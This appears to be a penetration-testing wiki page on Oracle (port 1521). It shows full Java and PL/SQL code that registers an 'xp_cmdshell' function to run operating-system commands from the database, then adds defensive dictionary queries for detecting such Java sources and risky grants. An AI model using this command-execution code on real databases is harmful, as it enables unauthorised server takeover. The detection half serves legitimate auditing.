# 1521 - oracle

### getRuntime

Oracle JVM is a Java Virtual Machine that can run Java applications and code. Unlike MSSQL, Oracle has no function that directly supports executing system commands, but system commands can still be executed through Java code.

{% code title="Java code" %}

```java
CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED "CommandExecutor" AS
import java.io.*;
import java.nio.charset.StandardCharsets;

public class CommandExecutor {
    private static final int MAX_OUTPUT_CHARS = 4000;
    public static String run(String cmd) {
        if (cmd == null || cmd.trim().isEmpty()) {
            return "No command specified";
        }

        StringBuilder sb = new StringBuilder();
        try {
            Process proc = Runtime.getRuntime().exec(cmd);
            try (BufferedReader outReader = new BufferedReader(
                     new InputStreamReader(proc.getInputStream(), StandardCharsets.UTF_8));
                 BufferedReader errReader = new BufferedReader(
                     new InputStreamReader(proc.getErrorStream(), StandardCharsets.UTF_8))) {

                String line;
                while ((line = outReader.readLine()) != null) {
                    if (sb.length() + line.length() + 1 > MAX_OUTPUT_CHARS) {
                        sb.append("\n...[output truncated]...");
                        break;
                    }
                    sb.append(line).append('\n');
                }
                while ((line = errReader.readLine()) != null) {
                    if (sb.length() + line.length() + 1 > MAX_OUTPUT_CHARS) {
                        sb.append("\n...[output truncated]...");
                        break;
                    }
                    sb.append(line).append('\n');
                }
            }
            int exitCode = proc.waitFor();
            sb.append("[exitCode=").append(exitCode).append(']');
            return sb.toString();

        } catch (Exception e) {
            return "ERROR: " + e.getClass().getName() + ": " + e.getMessage();
        }
    }
}
/
```

{% endcode %}

{% code title="Oracle code" %}

```sql
CREATE OR REPLACE FUNCTION xp_cmdshell(cmd VARCHAR2)
RETURN VARCHAR2
AS LANGUAGE JAVA
NAME 'CommandExecutor.run(java.lang.String) return java.lang.String';
/
```

{% endcode %}

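If the account has the privileges to register Java source and functions and both were registered successfully, system commands can be executed through the registered user-defined function xp\_cmdshell.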

<pre class="language-sql"><code class="lang-sql"><strong>-- Call the user-defined function
</strong>SELECT xp_cmdshell('whoami') FROM dual;

<strong>-- Remove the Java source and the user-defined function
</strong>DROP JAVA SOURCE "CommandExecutor";
DROP FUNCTION xp_cmdshell;
</code></pre>
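From the defender's side, the same technique leaves dictionary artifacts that can be audited. The queries below are an added example, not part of the original page; they assume a DBA-level account with access to the `DBA_*` views and Oracle 12c or later for the `ORACLE_MAINTAINED` column.

```sql
-- 1) Java sources in non-Oracle schemas whose text references process execution
--    (the page's CommandExecutor class would match on Runtime.getRuntime).
SELECT s.owner, s.name, s.line, s.text
FROM   dba_source s
WHERE  s.type = 'JAVA SOURCE'
AND    (s.text LIKE '%Runtime.getRuntime%' OR s.text LIKE '%ProcessBuilder%')
AND    s.owner NOT IN (SELECT username FROM dba_users WHERE oracle_maintained = 'Y')
ORDER  BY s.owner, s.name, s.line;

-- 2) Call specifications: PL/SQL units that wrap a Java method, as the page's
--    xp_cmdshell function does. Matches only when LANGUAGE JAVA sits on one line.
SELECT s.owner, s.name, s.type, s.line, s.text
FROM   dba_source s
WHERE  s.type IN ('FUNCTION', 'PROCEDURE', 'PACKAGE', 'PACKAGE BODY')
AND    UPPER(s.text) LIKE '%LANGUAGE JAVA%'
AND    s.owner NOT IN (SELECT username FROM dba_users WHERE oracle_maintained = 'Y')
ORDER  BY s.owner, s.name, s.line;

-- 3) Recently created or changed Java objects, newest first, for triage.
SELECT o.owner, o.object_name, o.object_type, o.created, o.last_ddl_time
FROM   dba_objects o
WHERE  o.object_type IN ('JAVA SOURCE', 'JAVA CLASS')
AND    o.oracle_maintained = 'N'
ORDER  BY o.last_ddl_time DESC;

-- 4) Java policy grants that allow executing OS binaries from the Oracle JVM.
SELECT p.grantee, p.kind, p.type_name, p.name, p.action, p.enabled
FROM   dba_java_policy p
WHERE  p.type_name = 'java.io.FilePermission'
AND    LOWER(p.action) LIKE '%execute%'
ORDER  BY p.grantee;

-- 5) Accounts and roles that can register stored code or hold broad Java roles.
SELECT grantee, privilege AS granted
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE PROCEDURE', 'CREATE ANY PROCEDURE')
UNION ALL
SELECT grantee, granted_role
FROM   dba_role_privs
WHERE  granted_role IN ('JAVASYSPRIV', 'JAVAUSERPRIV')
ORDER  BY 1, 2;
```

Grantees returned by queries 4 and 5 that are application or low-privilege accounts are candidates for revocation.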

## Demo

<figure><img src="/files/Uf5AMxLuidA3yiPpZeYV" alt=""><figcaption></figcaption></figure>


